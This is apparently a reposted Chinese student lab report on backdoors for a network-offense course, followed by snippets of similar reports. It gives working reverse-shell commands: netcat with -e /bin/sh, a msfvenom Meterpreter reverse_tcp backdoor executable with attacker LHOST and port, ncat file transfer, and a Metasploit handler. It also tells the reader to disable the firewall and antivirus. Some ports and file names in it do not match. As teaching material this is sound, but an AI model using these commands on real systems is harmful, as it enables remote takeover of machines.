后门原理与实践

最新推荐文章于 2024-04-01 23:08:41 发布
最新推荐文章于 2024-04-01 23:08:41 发布
阅读量243 收藏
点赞数
原文链接:http://www.cnblogs.com/2017yaya/p/9085935.html
版权

后门的定义

后门就是不经过正常认证流程而访问系统的通道。

哪里有后门呢?

1编译器留后门

2操作系统留后门

3最常见的当然还是应用程序中留后门
4还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。

实验准备

1、把虚拟机kali的网络改为桥接
2、修改windows控制台的编码方式
法一:在cmd中输入 CHCP 65001(临时转码,不可永久)
1249774-20180524221230927-730586752.png

法二:修改regedit注册表
详细操作见此地址:(百度的力量十分强大)https://blog.csdn.net/chy555chy/article/details/78355985
3、关掉防火墙与杀毒软件

一、实验内容

(一)Windows获得Linux Shell:

  1. 在Windows下,先使用ipconfig指令查看winXP(物理机)
    1249774-20180525110612352-582345775.png

  2. 使用ncat.exe程序监听本机的1120端口:
    1249774-20180525105502345-1566374633.png

3.Kali:使用nc指令的-e选项反向连接Windows主机的1120端口
1249774-20180525110827720-1291377400.png

4.Windows下成功获得了一个Kali的shell,运行ls指令如下
1249774-20180525110926471-1900512732.png

发生乱码,应提前修改编码方式UTF-8,此时先不改。

(二)使用MSF meterpreter生成可执行文件,利用ncat传送到主机并运行获取主机Shell输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1120 -f exe > 20179225_backdoor.exe生成后门程序,生成一个名称为20179225_backdoor.exe 后门可执行文件
1249774-20180525123044250-254324509.png

利用ncat或socat传送到主机
接下来需要将这个后门程序传到我们的靶机上,可以通过ncat来实现
在win的cmd下使用 ncat.exe -lv 1120 > 20179225_backdoor.exe 命令在443号端口进行监听
1249774-20180525130818265-1431836983.png

然后在Linux下使用 ncat -nv 192.168.1.104 443 < 20145328.encat -nv 192.168.1.109 1120 < 20179225_backdoor.exe命令把文件传送过去
1249774-20180525131325967-1372791057.png

不知为何,连接失败
现直接把文档拷贝过去
接下来

    首先msf打开监听进程

    msfconsole //进入msf
1249774-20180525142103303-1734678440.png

    use exploit/multi/handler//进入handler模式

    set payload windows/meterpreter/reverse_tcp//设置payload

    set LHOST 192.168.1.110//将LHOST设置为LinuxIP地址

    set LPORT 1120 //设端口为那个1120

1249774-20180525142629151-891526882.png

设置完成后,执行监听指令 exploit 。打开windows上的后门程序20151120_backdoor.exe
1249774-20180525144024527-1954341840.png

转载于:https://www.cnblogs.com/2017yaya/p/9085935.html

weixin_30815469
关注
20194311姜晨昊Exp2-后门原理实践
weixin_51927594的博客
03-28 1384
20194311姜晨昊Exp2-后门原理实践 实验基础 本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSF POST模块的应用。 基础知识 后门的概念 后门就是不经过正常认证流程而访问系统的通道。后门可能出现在编译器中、操作系统中,最常见的是应用程序中的后门,还可能是潜伏于操作系统中或伪装成特定应用的专用后门程序。 常用后门工具 NC和Netcat 底层工具,进行基本的
20194307肖江宇Exp2—后门原理实践
MYRLY的博客
03-28 3898
文章目录20194307肖江宇Exp-2后门原理实践1.实验基础1.1基础知识1.2常用后门工具NC和NetcatSoCat任何代理、转发等功能都可以用该工具实现。Meterpreter2.实验目标2.1实验环境3.实验过程3.1使用netcat获取主机操作Shell,cron启动**(1)在主机中获取虚拟机shell****(2)在虚拟机中获取主机shell****(3)在虚拟机中cron启动并在主机监听**3.2使用socat获取主机操作Shell,任务计划启动(1)在Windows获得Linux S
20145239《网络对抗》- 后门原理实践
weixin_30757793的博客
03-18 132
《网络对抗》—后门原理实践 基础问题回答   1. 例举你能想到的一个后门进入到你系统中的可能方式? 我下载了一款游戏或者软件其中有一个不明的程序是捆绑的后门程序。   2. 例举你知道的后门如何启动起来(win及linux)的方式? Win中的管理工具中可以设置时间点,令任务按计划启动,或者可以伪装成别的程序骗用户点开运行,网页木马。 Linux下通过cron启动。 ...
无端口后门
04-24
基于C_S结构的无端口后门的研究与实现
20165306 Exp2 后门原理实践
weixin_33787529的博客
03-23 236
20165306 Exp2 后门原理实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内...
2018-2019-2 网络对抗技术 20165335 Exp2 后门原理实践
weixin_34365635的博客
03-22 160
一.基础问题回答:   (1)例举你能想到的一个后门进入到你系统中的可能方式?     钓鱼网站:搞一个假网站,假淘宝,盗版电影,文库下载文档什么的,下载东西的时候把带隐藏的后门程序附带下载进去,自启动,反弹连接。     搞一个小网站,用iframe标签跳转到危险网页,自动下载程序。   (2)例举你知道的后门如何启动起来(win及linux)的方式?     修改注册表,开机的时候自...
20145226夏艺华 后门原理实践
weixin_30809173的博客
03-18 262
20145226夏艺华 后门原理实践 实验主要内容 使用ncat、socat实现两台电脑间的后门连接;meterpreter的应用;MSF POST模块的使用 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? · 攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门。 · 攻击者攻陷一台主机,获...
20192209 Exp2-后门原理实践
LIULIULOO的博客
04-01 754
20192209 Exp2-后门原理实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpreter的应用 :MSF POST 模块的应用 学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。 最后编辑:20180221 Wildlinux 1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 哪里有后门呢? 编译器留后门 操作系统留后门 最常见的当然还是应用程序中留后门 还有就是潜伏于操作系统..
网络对抗技术-Exp2-后门原理实践 20181314
weixin_46014245的博客
03-15 432
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
20204323太晓梅 网络对抗技术 exp2 后门原理实践
m0_57567318的博客
03-24 218
但是我在前期仍然是遇到了很多问题,以前我总是会下意识的向别人求助,但是在本次实验中由于我碰到的问题我周围的人都没有遇到类似的,我想到老师视频中也是遇到了很多困难,但是都是通过自己的各种猜想去判断检查,上网查看解决方法,老师上课时也举例子讲了一些简单的排查流程。但由于前期耗费了大量的时间,后面在对于meterpreter的使用理解的不是很到位,只是参考别人的实验代码理解和使用命令行进行操作,对其内部的机理了解不深,本来想尝试做一下加分项的,但是最后放弃了,在这点上我还需要提高。后门便是其中的一种。
20155301实验二 后门原理实践
weixin_33811539的博客
04-01 335
20155301实验二 后门原理实践 基础问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:浏览网站所附带的软件,或者在不正规的下载网站下载软件。 (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:通过开机自动运行脚本或者和程序绑定的方式运行。 (3)Meterpreter有哪些给你映像深刻的功能 答:抓取屏幕,打开摄像机和录像,感觉很恐怖。 (4)如何发现自...
实验二 后门原理实践
最新发布
guozhangyang的博客
04-01 1556
Socat的主要特点就是在两个数据流之间建立双向通道,且支持众多协议和链接方式,如IP,TCP,UDP,IPv6,pipe,exec,system,open,proxy,openssl,socket等。这个脚本或程序会定期执行,并在执行时建立一个反弹式连接到你的控制服务器,可以通过该连接对后门进行控制。功能​:端口转发​、​端口映射​、​端口监听、​tcp/udp连接​、​文件传送​、​nat映射​、使用openssl加密传输​。让我印象最深的是获取目标主机摄像头,按键,鼠标移动数据。
Exp2 后门原理实践 20164309
a569847381的博客
03-22 402
准备工作: 使用 ipconfig 查看win7虚拟机IP地址为:192.168.236.130 使用 ipconfig 查看linux虚拟机IP地址为:192.168.236.131 实验内容 一、使用nc或netcat远程获取shell (1)win获得Linux shell 1.windows打开监听 进入文件夹 cd netcat ...
Exp2 后门原理实践 20164320 王浩
weixin_34080571的博客
03-24 276
一、实践基本内容 1.实践目标 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝...
解析***后门原理
weixin_34061042的博客
01-31 163
由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“***”该怎么样清除。因此最关键的还是要知道“***”的工作原理,这样就会很容易发现“***”。  “***”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现...
劫持WSAAccept()实现无端口后门
民工之家
04-25 1633
     劫持WSAAccept()实现无端口后门                                                                               随着网民安全意识的日益提高,现在找个安全隐蔽饿后门是越来越难了。用现成的固然省事,但无奈前有防火墙的堵截、后有杀毒软件的追击,用起来还得百般小心,生怕露出马脚,被管理员发现,好不容易得来的
20155325 Exp2 后门原理实践
azxkjsh204704390的博客
04-03 162
基础问答 例举你能想到的一个后门进入到你系统中的可能方式? 乱点链接 学电脑小白不正确配置电脑 下载非官网软件 例举你知道的后门如何启动起来(win及linux)的方式? 软件:ncat socat 修改文件:crontab 与其他方式(比如木马)联合,被其他程序启动 Meterpreter有哪些给你映像深刻的功能? 截屏 录音 录像 感觉毫无隐私可言了 如何发现自己有系统有没有被...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值